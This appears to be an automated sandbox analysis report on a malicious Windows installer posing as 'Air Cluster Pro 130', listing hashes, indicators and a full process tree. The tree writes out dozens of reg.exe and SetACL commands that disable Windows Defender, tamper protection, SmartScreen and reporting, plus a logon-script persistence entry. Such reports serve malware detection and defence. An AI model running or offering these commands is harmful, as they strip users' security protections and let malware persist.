Analysis
max time kernel: 71s
max time network: 153s
platform: windows10-1703_x64
resource: win10-20230703-en
resource tags: arch:x64, arch:x86, image:win10-20230703-en, locale:en-us, os:windows10-1703-x64, system
submitted: 09/07/2023, 23:45

Static task: static1
Behavioral task: behavioral1
Sample: Air Cluster Pro 130.exe
Resource: win10-20230703-en

General
Target: Air Cluster Pro 130.exe
Size: 1.6MB
MD5: 5befdb53cdb4441bf5e597ec3f94e95e
SHA1: 1e9b658228de7ef6e73f9db5dffcee9bce362d2d
SHA256: 47eb4710f7de558af843178388748abd984027eb76cdd1b6ff50fa8257babeed
SHA512: ccc75f6b6bf6a147ee2ab4f552a375d741735d3752740d21dc177b0184a401812f807ec307d7591ae5c66430cc582c5073ce56d45b76fdf03b0d76acf795412e
SSDEEP: 24576:s7FUDowAyrTVE3U5F/X+IAKic6QL3E2vVsjECUAQT45deRV9RI:sBuZrEU69KIy029s4C1eH9S
Malware Config
Signatures
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | PowerRun64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | DllHost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | MicrosoftEdgeCP.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" | svchost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | SetACL64.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" | SetACL64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | svchost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | PowerRun64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | bsetgaf.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Conhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | Conhost.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | bsetgaf.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" | DllHost.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" | reg.exe
Modifies security service 2 TTPs 4 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | reg.exe
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Control Panel\International\Geo\Nation | cmd.exe
Executes dropped EXE 64 IoCs
pid | Process
4220 | Air Cluster Pro 130.tmp
4372 | setup.exe
4204 | setup.tmp
4192 | s0.exe
1036 | s0.tmp
2628 | wmiprvse.exe
204 | s1.exe
3228 | SetACL32.exe
5088 | svchost.exe
3100 | PowerRun.exe
1104 | SetACL32.exe
1420 | Conhost.exe
3052 | reg.exe
2932 | SetACL32.exe
2700 | reg.exe
3100 | PowerRun.exe
2084 | reg.exe
1108 | Conhost.exe
3144 | reg.exe
4816 | reg.exe
4268 | PowerRun.exe
4400 | reg.exe
5064 | reg.exe
1864 | reg.exe
4552 | reg.exe
756 | PowerRun.exe
508 | Process not Found
4208 | reg.exe
4532 | reg.exe
5000 | Process not Found
1864 | reg.exe
1640 | PowerRun.exe
4304 | PowerRun.exe
5060 | reg.exe
4532 | bsetgaf.exe
3004 | PowerRun.exe
5000 | Process not Found
312 | reg.exe
5064 | reg.exe
1076 | SetACL64.exe
4304 | PowerRun.exe
3100 | PowerRun.exe
1640 | PowerRun.exe
312 | reg.exe
1980 | Conhost.exe
2252 | reg.exe
4184 | PowerRun.exe
2084 | reg.exe
5064 | reg.exe
3584 | reg.exe
2696 | reg.exe
3004 | PowerRun.exe
2996 | reg.exe
4552 | reg.exe
4140 | reg.exe
3840 | reg.exe
4012 | PowerRun.exe
2032 | reg.exe
4640 | PowerRun.exe
2956 | PowerRun.exe
4316 | reg.exe
316 | powershell.exe
2084 | reg.exe
3840 | reg.exe
Loads dropped DLL 13 IoCs
pid | Process
4204 | setup.tmp
4204 | setup.tmp
4204 | setup.tmp
1036 | s0.tmp
2628 | wmiprvse.exe
2628 | wmiprvse.exe
2628 | wmiprvse.exe
2628 | wmiprvse.exe
2628 | wmiprvse.exe
2628 | wmiprvse.exe
2628 | wmiprvse.exe
204 | s1.exe
204 | s1.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features | SetACL64.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Signature Updates | SetACL64.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\DisableAntiVirus = "1" | PowerRun.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops file in Program Files directory 16 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-DLQVL.tmp | s0.tmp
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat | s0.tmp
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mfcm140.dll | s0.tmp
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\unins000.dat | s0.tmp
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\ODISSDK.dll | s0.tmp
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\DMReportSnapshot.dll | s0.tmp
File created | C:\Program Files (x86)\Air Cluster Pro 130.exe\is-KUGKJ.tmp | Air Cluster Pro 130.tmp
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\mpnfimp.dll | s0.tmp
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-E3T9M.tmp | s0.tmp
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-NCNS5.tmp | s0.tmp
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-N1EFL.tmp | s0.tmp
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-8J05F.tmp | s0.tmp
File created | C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat | Air Cluster Pro 130.tmp
File opened for modification | C:\Program Files (x86)\Air Cluster Pro 130.exe\unins000.dat | Air Cluster Pro 130.tmp
File opened for modification | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\cnpacnoc.dll | s0.tmp
File created | C:\Program Files (x86)\dl2AaL24LxDSqSJOJLa LLC\is-A7BIE.tmp | s0.tmp
Drops file in Windows directory 8 IoCs
description | ioc | Process
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Logs\DPX\setupact.log | expand.exe
File opened for modification | C:\Windows\Logs\DPX\setuperr.log | expand.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
NSIS installer 4 IoCs
resource | yara_rule
behavioral1/files/0x000600000001b070-370.dat | nsis_installer_1
behavioral1/files/0x000600000001b070-370.dat | nsis_installer_2
behavioral1/files/0x000600000001b070-375.dat | nsis_installer_1
behavioral1/files/0x000600000001b070-375.dat | nsis_installer_2
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-1766410430-2870137818-4067673745-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: MapViewOfSection 10 IoCs
pid  Process
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
812  MicrosoftEdgeCP.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 3 IoCs
pid   Process
4220  Air Cluster Pro 130.tmp
1036  s0.tmp
2628  wmiprvse.exe
Suspicious use of SetWindowsHookEx 4 IoCs
pid   Process
3580  MicrosoftEdge.exe
812   MicrosoftEdgeCP.exe
1612  MicrosoftEdgeCP.exe
812   MicrosoftEdgeCP.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp"C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp" /SL5="$801C8,833540,832512,C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp" /SL5="$20262,938139,832512,C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 22175⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp"C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp" /SL5="$202EE,9877208,832512,C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 22176⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* %ProgramData%7⤵
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* C:\ProgramData8⤵
- Drops file in Windows directory
PID:3840
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f7⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f8⤵PID:4816
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe"C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2628
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x00^&pb=1^&px=22177⤵
- Checks computer location settings
PID:3688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe" 9922175⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do32.bat6⤵
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:5088
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"7⤵PID:3100
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"7⤵PID:1420
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exeSetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"7⤵PID:2700
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f7⤵PID:2252
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f7⤵PID:1356
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f7⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f7⤵PID:4680
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f7⤵PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f7⤵PID:4288
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f7⤵PID:3600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f7⤵PID:3356
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f7⤵PID:2692
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f7⤵PID:4844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f7⤵PID:4188
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:2088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f7⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f7⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f7⤵PID:3724
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f7⤵PID:3132
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f7⤵PID:1844
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:4920
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f7⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f7⤵PID:4820
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f7⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f7⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f7⤵PID:4316
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f7⤵PID:3144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f7⤵PID:1980
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f7⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f7⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f7⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f7⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:1492
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3600
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3104
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f7⤵PID:3840
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:488
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f7⤵PID:5088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
PID:3096
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f7⤵PID:3312
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f7⤵PID:2624
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f7⤵PID:4284
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f7⤵PID:2088
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f7⤵PID:4268
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f7⤵PID:3516
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f7⤵PID:4300
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f7⤵PID:4400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f7⤵PID:4184
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f7⤵PID:4696
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f7⤵PID:2436
-
-
